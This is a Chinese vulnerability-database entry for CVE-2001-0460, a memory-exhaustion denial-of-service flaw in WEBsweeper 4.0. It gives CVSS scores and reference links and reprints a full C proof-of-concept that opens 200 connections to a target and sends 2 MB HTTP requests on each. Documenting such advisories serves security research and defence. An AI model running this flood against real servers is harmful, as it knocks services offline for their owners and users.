CVE-2001-0460
CVSS5.0
发布时间 :2001-06-27 00:00:00
修订时间 :2008-09-05 16:24:10
NMCOE    

[原文]Websweeper 4.0 does not limit the length of certain HTTP headers, which allows remote attackers to cause a denial of service (memory exhaustion) via an extremely large HTTP Referrer: header.


[CNNVD]Websweeper漏洞(CNNVD-200106-158)

        Websweeper 4.0版本不能限制某些HTTP头文件的长度。远程攻击者借助极其大的HTTP Referrer: header导致服务拒绝(内存消耗)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0460
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0460
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-158
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/167406
(VENDOR_ADVISORY)  BUGTRAQ  20010308 def-2001-10: Websweeper Infinite HTTP Request DoS
http://xforce.iss.net/static/6214.php
(VENDOR_ADVISORY)  XF  websweeper-http-dos

- 漏洞信息

Websweeper漏洞
中危 未知
2001-06-27 00:00:00 2005-10-20 00:00:00
远程  
        Websweeper 4.0版本不能限制某些HTTP头文件的长度。远程攻击者借助极其大的HTTP Referrer: header导致服务拒绝(内存消耗)。

- 公告与补丁

        

- 漏洞信息 (20681)

Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability (EDBID:20681)
windows dos
2001-01-22 Verified
0 honoriak
N/A [点击下载]
source: http://www.securityfocus.com/bid/2465/info

Baltimore Technology WEBsweeper is subject to a denial of service condition. Submitting an unusually long HTTP request through WEBsweeper will cause the consumption of all available memory on the server where WEBsweeper resides. 

/*

----[ honoriak from [HeliSec] 22.3.2001

   	[ Proof of concept Websweeper Infinite HTTP Request DoS  ]
   	[ Advisory Defcom Labs Advisory def-2001-10	         ]

	Thanks to doing and all helisec members: merphe, jet-li, kiss,
	lyw0d, bonjy.

*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <time.h>
#include <sys/time.h>
#include <fcntl.h>

#define PORT 80
#define LEN 2000000
#define CON 200

int i, v, n, sel, envi;
int cons[CON];
char ah[LEN];
char ahh[LEN + 7];
char *host;
fd_set env;
struct sockaddr_in victim;

void usage(char *prog) {
	printf("[ Websweeper Infinite HTTP Request DoS by honoriak@mail.ru ");
	printf("from Helisec ]\n");
	printf("-- Advisory: Defcom Labs Advisory def-2001-10 --\n\n");
	printf("Usage: %s hostname number_of_gets\n", prog);
	exit(0);
	}

unsigned long resolver(char *h)  {

struct in_addr h2;
struct hostent *hvic;

if (!(hvic = gethostbyname(h))) return(0);
memcpy((char *)&h2.s_addr, hvic->h_addr, hvic->h_length);
return(h2.s_addr);
}

int main(int argc, char *argv[])
{

	if (argc < 2)
        {
        	usage(argv[0]);
        }

bzero(&victim, sizeof(victim));
victim.sin_family = AF_INET;
victim.sin_port = htons(PORT);

if ( (inet_pton(AF_INET, argv[1], &victim.sin_addr)) <= 0)
	{
	victim.sin_addr.s_addr = resolver(argv[1]);
	}

if (!victim.sin_addr.s_addr) {
	printf("Error resolving host\n");
	exit(-1);
	}

for (i=0; i<=(LEN-1); i++)  ah[i] = 'a';
ah[LEN-1] = '\0';
printf("Sending Infinite HTTP Request...\n");

sprintf(ahh, "GET /%s\n", ah);

for (sel=0; sel < CON; sel++)
{

if ((cons[sel] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	printf("Error opening socket\n");
        exit(-1);
        }

if ( (n=connect(cons[sel], (struct sockaddr *)&victim, sizeof(victim))) < 0) {
                  printf("Error connecting\n");
                  exit(-1);
         }

}

for (sel=0; sel < CON; sel++) {

FD_SET(cons[sel], &env);

envi=select(cons[sel] + 1, NULL, &env, NULL, NULL);

if ( FD_ISSET(cons[sel], &env) ) {
if ( (send(cons[sel], ahh, strlen(ahh), 0)) < 1) {
	printf("Error sending\n");
	exit(-1);
	}
}

}
exit(-1);
}

/* [HeliSec] <=> [Helios Security and Administration] */

		

- 漏洞信息

13882
WEBsweeper Large HTTP Referrer: Header Handling Remote Memory Exhaustion DoS
Local / Remote, Context Dependent Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

Websweeper contains a flaw that may allow a remote denial of service. The issue is triggered when sending excessively long HTTP headers, and will result in loss of availability for the platform by consuming available memory resources.

- 时间线

2001-03-08 Unknow
2001-03-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. The vendor suggests using a firewall.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站